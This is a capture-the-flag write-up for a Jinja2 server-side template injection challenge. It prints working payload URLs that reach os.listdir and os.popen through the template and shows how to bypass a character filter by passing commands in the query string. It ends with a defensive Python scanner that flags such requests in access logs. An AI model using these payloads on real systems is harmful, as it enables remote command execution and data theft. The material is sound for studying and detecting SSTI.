Challenge Description
Picking a starter is hard, I hope you can do it.
Flag format: PCTF{}
Author: @angr404
http://chal.pctf.competitivecyber.club:5555
Solution
This is a simple Jinja2 server-side template injection, found by manual fuzzing. What makes this challenge a bit more challenging is that some characters, such as +-*/"', are not allowed in the URL path. To bypass this, we put those characters in the URL query string instead and reference them from the template via request.args.
Listing the root directory:
http://chal.pctf.competitivecyber.club:5555/{{namespace.__init__.__globals__.os.listdir(request.args.f)}}?f=/
The root directory has a file called flag.txt. We can read the file using the following URL:
http://chal.pctf.competitivecyber.club:5555/{{namespace.__init__.__globals__.os.popen(request.args.f).read()}}?f=cat</flag.txt
Flag: PCTF(wHOS7H47PoKEmoN)
(Note: instead of cat</flag.txt you can also use cat${IFS}/flag.txt.)
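As an added example, not part of the original writeup: a stdlib-only Python check that scans access-log lines for the request shape used above (Jinja2 delimiters or dunder attribute access in the percent-decoded path or query string), the kind of rule a defender would run over a Flask app's logs. The log lines, client IPs and timestamps are constructed; only the third and fourth mirror the payload shape shown in this writeup.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not real traffic). Lines 3 and 4
# mirror the writeup's requests, with braces percent-encoded as a client would.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /pikachu HTTP/1.1" 200 42
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%7Bnot-a-template%7D HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /%7B%7Bnamespace.__init__.__globals__.os.listdir(request.args.f)%7D%7D?f=/ HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /%7B%7Bnamespace.__init__.__globals__.os.popen(request.args.f).read()%7D%7D?f=cat%3C/flag.txt HTTP/1.1" 200 31
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Jinja2 delimiters or Python dunder attribute access inside a request target
# are strong SSTI indicators. The query string is checked too, because a
# filtered path can pull the rest of the payload from request.args.
INDICATORS = [
    ("jinja_expression", re.compile(r"\{\{.*\}\}")),
    ("jinja_statement", re.compile(r"\{%.*%\}")),
    ("dunder_attribute", re.compile(r"\.__\w+__")),
]


def decode_target(target):
    """Split path and query, then percent-decode twice to catch double encoding."""
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    for _ in range(2):
        path, query = unquote(path), unquote(query)
    return path, query


def scan_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, query = decode_target(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(path) or rx.search(query)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": path, "query": query, "indicators": hits}


def scan_log(text):
    """Scan every line of an access log and collect findings."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]
```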
Further reading
- Read jinja2-ssti on how to exploit Jinja2 SSTI.